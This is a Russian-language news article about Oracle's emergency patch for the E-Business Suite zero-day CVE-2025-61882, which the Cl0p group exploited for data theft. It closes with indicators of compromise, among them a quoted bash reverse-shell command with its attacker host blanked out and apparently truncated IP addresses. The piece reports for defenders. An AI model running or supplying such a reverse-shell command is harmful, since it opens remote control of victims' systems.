Почему экстренный патч Oracle не спасет от уже свершившихся атак?

Компания Oracle выпустила экстренное обновление безопасности для устранения критической уязвимости нулевого дня (CVE-2025-61882) в своем продукте E-Business Suite. Выпуск патча был вызван активной эксплуатацией уязвимости в реальных условиях хакерской группировкой Cl0p, которая использовала ее в августе 2025 года для проведения широкомасштабной кампании по краже данных у множества организаций.
Почему экстренный патч Oracle не спасет от уже свершившихся атак?
Изображение носит иллюстративный характер

Уязвимость CVE-2025-61882 получила оценку 9.8 из 10 по шкале CVSS, что соответствует критическому уровню опасности. Проблема затрагивает компонент Oracle Concurrent Processing и может быть использована удаленно через сеть по протоколу HTTP без какой-либо аутентификации. Успешная эксплуатация позволяет злоумышленнику полностью скомпрометировать компонент и выполнить произвольный код на целевой системе.

За атаками стоит известная группа вымогателей Cl0p. В августе 2025 года она провела кампанию, которую компания Mandiant (принадлежащая Google) охарактеризовала как «массовую рассылку по электронной почте», запущенную с сотен скомпрометированных учетных записей. Целью кампании была кража больших объемов конфиденциальной информации.

Анализ показал, что Cl0p использовала комбинированный подход. Группировка эксплуатировала как ранее известные уязвимости в Oracle E-Business Suite, исправленные в обновлении от июля 2025 года, так и новую уязвимость нулевого дня CVE-2025-61882, что позволило достичь максимального охвата целей.

Роб Духарт, директор по безопасности Oracle, сообщил, что исправления для CVE-2025-61882 также включают обновления против «дополнительной потенциальной эксплуатации», выявленной в ходе внутреннего расследования компании. Это указывает на комплексный характер угрозы, обнаруженной специалистами Oracle.

Ключевое предупреждение исходит от Чарльза Кармакала, технического директора Mandiant в Google Cloud. В своем сообщении на LinkedIn он подчеркнул, что массовая эксплуатация уязвимости нулевого дня уже произошла. Это означает, что многие организации могли быть скомпрометированы еще до выхода официального патча.

В связи с этим Кармакал настоятельно рекомендует всем организациям, использующим Oracle E-Business Suite, провести тщательное расследование своих систем на предмет возможной компрометации. Простая установка обновления не гарантирует безопасность, если злоумышленники уже получили доступ к инфраструктуре.

Ожидается, что после публикации информации об уязвимости другие киберпреступные группы также начнут ее использовать. Этот процесс, известный как «эксплуатация n-day», представляет дополнительную угрозу для компаний, которые не успеют оперативно установить исправление и проверить свои системы на наличие следов взлома.

Для выявления компрометации системным администраторам рекомендуется проверить наличие подозрительной активности, связанной со следующими индикаторами. Была зафиксирована сетевая активность (GET и POST запросы) с IP-адресов 107.207[.]26 и 185.181.60[.]11.

В системах может присутствовать вредоносная команда оболочки, предназначенная для создания обратного TCP-соединения (reverse shell) с сервером злоумышленника: sh -c /bin/bash -i >& /dev/tcp// 0>&1.

Также следует обратить внимание на наличие файлов с именами, указывающими на эксплуатацию уязвимости. К таким файлам относятся: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py и oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py.


Новое на сайте

19208Как новые поколения троянов удаленного доступа захватывают системы ради кибершпионажа и... 19207Почему мировые киберпреступники захватили рекламные сети, и как Meta вместе с властями... 19206Как фальшивый пакет StripeApi.Net в NuGet Gallery незаметно похищал финансовые API-токены... 19205Зачем неизвестная группировка UAT-10027 внедряет бэкдор Dohdoor в системы образования и... 19204Ритуальный предсвадебный плач как форма протеста в традиционном Китае 19203Невидимая угроза в оперативной памяти: масштабная атака северокорейских хакеров на... 19202Как уязвимость нулевого дня в Cisco SD-WAN позволяет хакерам незаметно захватывать... 19201Как Google разрушил глобальную шпионскую сеть UNC2814, охватившую правительства 70 стран... 19200Как простое открытие репозитория в Claude Code позволяет хакерам получить полный контроль... 19199Зачем киберсиндикат SLH платит женщинам до 1000 долларов за один телефонный звонок в... 19198Устранение слепых зон SOC: переход к доказательной сортировке угроз для защиты бизнеса 19197Скрытые бэкдоры в цепочках поставок по: атаки через вредоносные пакеты NuGet и npm 19196Как абсолютная самоотдача, отказ от эго и физиологическое переосмысление тревоги помогают... 19195Отказ от стратегии гладиаторов как главный драйвер экспоненциального роста корпораций 19194Цена ручного управления: почему отказ от автоматизации данных разрушает национальную...
Ссылка